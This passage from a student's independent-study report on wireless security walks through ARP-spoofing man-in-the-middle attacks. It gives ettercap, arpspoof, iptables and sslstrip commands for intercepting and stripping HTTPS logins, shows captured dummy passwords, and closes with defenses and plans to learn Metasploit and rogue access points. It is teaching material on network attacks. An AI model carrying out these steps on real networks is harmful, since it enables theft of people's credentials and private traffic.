Before Spoofing

After Spoofing

Figure 12. ARP Spoofing

Page 27

Flathers - 28
The physical address of the default gateway was changed to the address of the attackers system.
The victims machine now directs all traffic to the attackers system, thinking that it is the
gateway. The ARP tables on the gateway have changed as well.
Once the traffic being redirected to our computer, we can begin to monitor it. Programs like
Wireshark can now be used to read packets. A lot of valuable information is sent in plaintext
over packets, including unencrypted usernames and passwords. Wireshark can also be set up to
read emails, chat logs, etc.
In this set up, any information sent over an unencrypted medium is readable by the attacker. This
includes HTTP, FTP, SMTP and many more. While useful information is often sent over these
unsecure protocols, the real valuable information to an attacker, like important passwords and
login information will be encrypted and sent over secure channels like SSL. It is still possible,
though, to exploit a man-in-the-middle attack to obtain this encrypted data.
Advanced Software. Ettercap is a multi purpose tool that is included with Backtrack that
automates many man in the middle techniques. It is a very flexible program that allows
customizable scripts and plugins to perform a multitude of attacks. In addition to being able to
perform ARP spoofing man in the middle attacks, Ettercap is also capable of other MiTm style
attacks, such as DHCP and DNS spoofs.
When ettercap is launched as a man in the middle ARP attack on a target, it automatically
redirects and forwards traffic, eliminating the need to manually do it. It also poisons the targets
ARP cache - meaning it changes the ARP data on the target for the duration of the attack. When
ettercap closes, it returns the packet forwarding to normal and un-poisions the victims ARP
cache. To perform a simple ARP poison MiTm attack on host 10.0.0.4 with the gateway
10.0.0.1, issue the following command:
# ettercap -i wlan1 -T -M ARP:REMOTE /10.0.0.1/ /10.0.0.4/

The -T parameter sets ettercap in text mode. Although it does have a GUI, like most applications
in Backtrack, it is most flexible from the command line. The -M option is for a man in the middle
attack, and ARP is the type of attack we want to perform. Adding REMOTE allows ettercap to sniff
remote connections beyond the gateway.
Once the attack is running, we can perform any number of information gathering techniques.
Ettercap also comes with plugins that can perform specific functions. A particularly useful one is
the ability to spoof DNS. The file /usr/share/ettercap/etter.dns can be configured to
redirect DNS host names to new IP addresses. When ettercap is running a MiTm attack and this
plugin is launched, ettercap will redirect all traffic according to the rules in the etter.dns file. This
is especially useful in getting the victim to visit malicious websites.

Page 28

Flathers - 29
Perhaps the most useful feature of ettercap is its ability to fake authentication certificates. This
allows ettercap to intercept and read encrypted internet traffic, such as sensitive passwords and
banking information. This type of traffic is generally encrypted with SSL.

ENCRYPTED TRAFFIC
SSL Encryption. Secure Socket Layer (SSL) was developed by Netscape in the nineties as a way
to privately communicate and share data. It has been replaced by a newer version called
Transport Layer Security (TSL), although it is still commonly referred to as SSL. It is a method
used to privately share data between any two communicating applications, though its most
notable use is sending encrypted data over the web. The standard protocols for submitting data
over the internet are not secure and can be read by anyone sniffing the packets. Secure websites
encrypt the sensitive data using SSL, and use what is referred to as HTTPS, or a secure form of
HTTP, generally through port 443.
When the client tries to connect via HTTPS it sends an initial handshake to the server, which
then responds. They exchange keys and can then start transmitting encrypted data back and forth
to each other. The most important part, however, is not the handshake, or the encryption, but
authenticating the server. A user needs to make sure he is actually creating a secure connection
with his real online bank, and not a look-a-like that will steal his data. To authenticate the server,
browsers use digital certificates.
When a customer tries to access a secure website, like their bank for example, before they
establish a secure connection they need assurance that the bank is who they say they are. So the
bank presents them with a digital certificate from a third party verifying that they are legitimate.
But to verify that the third partys certificate is legitimate as well, the third party also presents a
form of authentication. This process of trust keeps leading upwards until it reaches a high level,
well trusted authority, referred to as a trust anchor. In a sense, every secure website is entangled
in a large web of trust that leads back up to the top to a few very trusted, high level authorities. If
a websites certificate falls on this chain of trust, the user can trust that the website is legitimate.
Fake Certificates. Since the encryption is nearly unbreakable with SSL, the vulnerability lies in
the authentication process. When an attacker gets in the middle of a client trying to securely
connect to a server, he can break the authentication up into 2 parts. Take the example of
accessing a bank. The man-in-the-middle can pretend to be the customer when communicating
with the bank. And when communicating with the user, he pretends to be the bank. If all worked
well, neither party would suspect a thing. This is the purpose of the digital certificate. The
attacker does not have the verified certificate that the bank has, so he cannot authenticate himself
to the user to initialize the secure connection.

Page 29

Flathers - 30
However, programs like ettercap are capable of faking a certificate. The certificate imitates the
real one, but will not be fully verified. Whatever browser the customer is using will recognize
that the certificate is not official. It will warn the user that the certificate is not verified and ask if
they want to proceed. If the user accepts the certificate anyway, then a secure connection is
established with the attackers machine. The victim believes they are directly connected to the
bank but in reality they are sending all of their encrypted data directly to the attacker.
Ettercap has a certificate template built in and will automatically attempt to have the target
accept the certificate whenever it intercepts encrypted traffic. As an example, first start ettercap
in an ARP poisoning MiTm attack between the victim and the gateway:
# ettercap -i wlan1 -T -M ARP:REMOTE /10.0.0.1/ /10.0.0.4/

The program is now in the middle of all traffic between the victim and the outside internet. When
the victim goes to a secure website like https://www.bankofamerica.com, the real bank will
send over its certificate for verification. Ettercap will intercept this certificate and instead send its
own fake one to the victim. Depending on the browser the victim is using, a warning will pop up
similar to this:

Unverified Certificate

Figure 13. Browser Warning

Page 30

Flathers - 31
The browser does not trust the connection (because its really a connection from the attackers
machine) and tries to warn the user. Many users, however, do not fully comprehend the meaning
or danger of an unverified certificate, and may attribute this warning to just a bug. If the user
clicks Add Exception, the browser will temporarily allow this certificate and establish a secure
(SSL) connection between the victim and the attackers machine.
Now, when the victim submits his username and password from the banking website, they are
still being encrypted with SSL. Unfortunately, they are being encrypted using the attackers key
which means he, not the bank, can unencrypt it. Once the attacker in the middle unencrypts the
info he can see the username and password in plain text.
Ettercap handles all of this automatically. It sniffs out encrypted usernames and passwords and
will display them in plain text on the attackers computer. If it is left running for a period of time,
ettercap will even create a log file with all of the captured username and passwords for each site
the victim visited.
After intercepting the username and password, the attacker pretends to be the customer and
establishes a secure connection with the actual bank, then sends along the username and
password encrypted for the bank. The bank sees that it received the right username and password
and grants access, which is relayed back to the original victim. From both the victim and the
banks perspective, everything worked and was secure.
SSL Strip. Man in the middle attacks with fake certificates are fairly noticeable to the victim.
When he attempts to access a secure site, whatever browser he is using will display a large
warning that the certificate has not been verified. Many users, however, will click through the
warnings, especially if they have visited the site before. Some, though, will notice that something
is not right and immediately exit.
There is another MiTm attack that is even less noticeable to the user. When the victim is
accessing a secure website, like their bank, no warning will appear. This attack uses a tool
developed in 2009 called SSL Strip.
The principle behind SSL strip is that the attacker gets in the middle of communication
between a secure site (a bank) and the end user. The attacker creates the secure connection to the
bank instead of the user. As opposed to a fake certificate being sent to the user, in which a
warning would pop up, the attacker essentially strips the SSL from the website the victim is
accessing. For example, the main login page for an online bank may be something like
https://www.bankofamerica.com. Notice the protocol is HTTPS, so the connection is
secured by SSL. The program SSL strip intercepts this secure login page before it reaches the
user and replaces it with an identical looking page, minus the security. The user will see an
identical login page, but the address will be http://www.bankofamerica.com, lacking any form
of encryption.
Page 31

Flathers - 32
When the victim inputs his username and password on this unsecure page, the information is sent
over standard HTTP in plaintext to the man in the middle machine. The attacker reads the
username and password in plaintext, and then encrypts it using the public SSL key it got from the
bank and forwards it on. The login goes through and the victim has access to the website, but all
subsequent traffic is unencrypted and readable by the attacker.
The main difference between an SSL strip and a fake certificate attack is the way data is
transferred between the victim and the attacker. In a fake certificate MiTm attack, the victim is
still encrypting his username and data, but instead of using the verified public key provided by
the bank, he is using a key created by the attacker. In an SSL strip attack, the victim is not
encrypting any data and is sending information in plaintext to the attacker. The connection
between the attacker and the secure website is the same in both attacks.
As opposed to the large warning about an unverified certificate, the only warning a victim will
have in an SSL strip attack is that he is using HTTP instead of HTTPS. A very observant user
may notice that the s is missing from the URL, but it is not likely, especially if they have used
the site many times before. Browsers also feature a small icon that looks like a padlock to
indicate that encryption is being used. This is also missing in the attack, but the program SSL
strip can actually inject a fake secure icon to fool the user.
Using SSLStrip. SSL Strip is a free program that is included in Backtrack. To start the attack, the
first step is to allow packet forwarding, just as in a MiTm attack:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Once packet forwarding is enabled, the IP tables must be configured to redirect HTTP traffic
through the SSL strip program:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT -to-port 10000

What this step does is tell the attacker machine to listen for any HTTP traffic on port 80 it
intercepts between the victim and the gateway and redirect it an arbitrary port, in this case 10000.
When SSL strip is running, it will listen on port 10000 for traffic and remove the SSL from any
secure webpages. Start the SSL strip program and tell it to listen on port 10000:
# sslstrip -p -l 10000

This starts the SSLStrip program and tells it to listen on port 10000 for traffic. The -p option
tells it to only capture username and passwords (as opposed to all SSL traffic).
The final step is to start the man in the middle attack so the attackers computer can intercept the
data. This can be done using any of the techniques mentioned above, such as using ARP spoof,

Page 32

Flathers - 33
or ettercap. A fake certificate is not necessary when using SSLStrip, so ARPSpoof is a simpler
program:
# arpspoof -i wlan0 -t 10.0.0.1 10.0.0.3 && arpspoof -i wlan0 -t 10.0.0.3
10.0.0.1

SSL Strip will then automatically begin removing the security from webpages and forwarding
them to the victim. This is what the victim will see when directing their browser to a
(supposedly) secure site:

http:// instead of https://

Figure 14. SSL Stripping

Notice that the URL starts with http instead of https which it normally does. This is the only
evidence that something is different. Its extremely easy for a user to overlook.
When SSLStrip discovers a username and password, it will display them in plaintext for the
attacker to see. By default, SSLStrip saves all of the found usernames and passwords in a log file
in the root directory. After running the program for a few minutes directed at the victims
machine, the output looks like this:

Page 33

Flathers - 34

Figure 15. Captured Passwords

The program captured the username and password for 2 secure sites that the victim visited:
Gmail and Facebook. His Google login is victim1@usc.edu with password
gmailpassword. His Facebook login is victim2@usc.edu with password fbpassword.

PROTECTING FROM MITM ATTACKS

The first step in preventing man in the middle attacks is to stop the attacker from gaining access
to the network. For a MiTm attack to be successful, the attackers computer must be able to
communicate with both the victims machine and the gateway. Strong wireless encryption
passwords that are hard to break are recommended. Also, monitoring the network for
unauthorized devices can stop an attack before it begins.
If an attacker has network access, there are a few measures that can be taken to prevent ARP
spoofing. The best defense is to manually set static ARP tables. With this set up, the clients will
not send out ARP requests and they cannot be spoofed. This is tedious to set up however, as it
must be configured on every client and updated continuously.
Page 34

Flathers - 35
There is also monitoring software available that can detect changes in MAC addresses in ARP
tables. This can alert the user that somebody could be attempting an ARP spoof attack.
When a MiTm attack is successfully launched, precautions can be taken to avoid divulging
sensitive information. The attacker can read anything stored in plain text, so its important to
avoid protocols that do not have encryption. Also, users should heed the warnings of their
browsers when a certificate is not verified. This is a large indicator of a possible attack. Do not
use websites that have unverified certificates. Lastly, when accessing secure websites, make sure
that SSL is indeed being used. This can be done by ensuring the protocol is HTTPS. Software is
also available that can provide warnings to users when a website is not using SSL.

THE NEXT STEPS

The previous attacks are only the beginning of what is possible with wireless networks. They are
somewhat passive attacks, as they most rely on monitoring network data to collect
information. These attacks can still be quite devastating though to a small business or home
network.
After an attacker has performed these steps, he can attempt more active attacks against the
victim. Active attacks can occur when the attacker is able to directly communicate with the
victims machine. The first step in an active attack is to run a scan to discover hosts and
information about them. Nmap is particularly good at this.
Backtrack also includes a vulnerability scanner called OpenVAS. This is an open source fork of
the popular Nessus software. These vulnerability scanners provide much more details about the
hosts on the network and give the attacker possible angles of attack.
Metasploit. Backtrack includes the very powerful and easy to use Metasploit framework.
Metasploit is a collection of various known exploits and payloads. Instead of having to write
specific code to exploit machines, Metasploit allows an attacker to mix and match different
exploits and payloads for his needs. A payload is what the attacker receives when the attack is
successful. For most attacks, getting a command shell with administrator privileges is the
ultimate goal. From there, almost anything is possible. As the hacking community popularly
refers to it, getting a root shell is game over.
Metasploit works well with the scanning software also included in Backtrack. It can accept
results from Nmap and OpenVAS and then automatically tailor custom attacks based on the
information. With these tools, an attacker barely needs any programming or vulnerability
knowledge as Metasploit mostly automates the whole process.

Page 35

Flathers - 36
Possible things to do when a machine is popped (a term referring to gaining a root shell) is
browsing and accessing the files, installing keyloggers, and setting up Trojans, backdoors and
viruses on the network. I plan on researching these direct attacks much more in detail this
summer and learning how to perform and defend from them.
Rogue APs. The wireless attack techniques above all rely on being able to gain access to an
existing wireless network. Another form of attack lures victims to connect to the attackers own
network, where he can then perform further attacks. This is referred to as setting up a Rogue
Access Point.
This can be as simple as creating a wireless network with an innocuous name like Free WiFi
and hoping a user connects to it. There are more active ways to accomplish this however.
Windows machines save preferred networks so it can automatically connect to them when they
are in range. The machine will periodically send out beacons looking for these preferred
networks to see if they are in range. An attacker can intercept these beacons, and then create a
network with the exact same information. Windows thinks that this is the preferred network it
has saved and will automatically connect to it. From there, the attacker is free to do what he
wants.
I also plan to familiarize myself with setting up Rogue APs. Used in combination with
Metasploit, they can lead to extremely devastating attacks.

CONCLUSION
This independent study project was a challenging, yet very rewarding experience. I started with a
rough idea of what I wanted to research, having heard terms and ideas but not understanding
them. I really enjoyed researching and practicing what I wanted as I had no solid direction I
needed to go in.
I used the Hacking Exposed Wireless book as a rough guide, but did a lot more research on my
own through various forums and webistes. I followed a variety of tutorials and through the
practice my knowledge of the theory and application of these security principles increased
greatly.
I started with only a basic knowledge of Linux and almost no command line experience. I also
lacked a solid understanding of exactly how networking protocols worked. By the end of the
semester, I was not only much more proficient in Linux and command line tools, I understood
the intricacies of networking much better. Things I had learned in the past in previous classes
made a lot more sense to me now as I understood why things were working and not just how to
do them.
Page 36

Flathers - 37
Everything I learned this semester was self taught from books and online resources. I spent
countless hours trying things until I got them to work, and this trial and error process taught me
more than I could ever learn just from reading something. The tutorials I followed were only the
foundation for my knowledge. Once I learned how to use a specific tool, I thought of various
ways to use it and combine it with others. The exercises I created for myself were fun and
practical.
I have yet to cover everything I want to. As I learn new things I discover more I want to learn. I
plan on continuing using my current set up to learn more about all aspects of penetration testing
and network security. Specifically, I plan on becoming proficient in other forms of active attacks
and using exploits. It will be a fun summer.

Page 37

Flathers - 38

SOURCES
Cache, Johnny. Wright, Joshua. Liu, Vincent. Hacking Exposed Wireless: Wireless Security
Secrets and Solutions. 2010
http://www.backtrack-linux.org/
http://www.backtrack-linux.org/tutorials/
http://www.backtrack-linux.org/forums/
http://www.irongeek.com/i.php?page=security/security
http://www.irongeek.com/i.php?page=security/hackingillustrated
http://www.cacetech.com/documents/ARP%20Overview%201.1.pdf
http://nmap.org/book/man.html
http://forum.intern0t.net/offensive-guides-information/
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-beale-2.pdf
http://www.oxid.it/downloads/apr-intro.swf
http://www3.rad.com/networks/applications/secure/tls.htm
http://computing.ece.vt.edu/~jkh/Understanding_SSL_TLS.pdf
http://www.thoughtcrime.org/software/sslstrip/
https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-MarlinspikeDefeating-SSL.pdf
A lot of information came from trial and error and reading the --help pages for applications.
Many forum posts were read that contained bits of pieces of information. The main forums
visited are listed above.

Page 38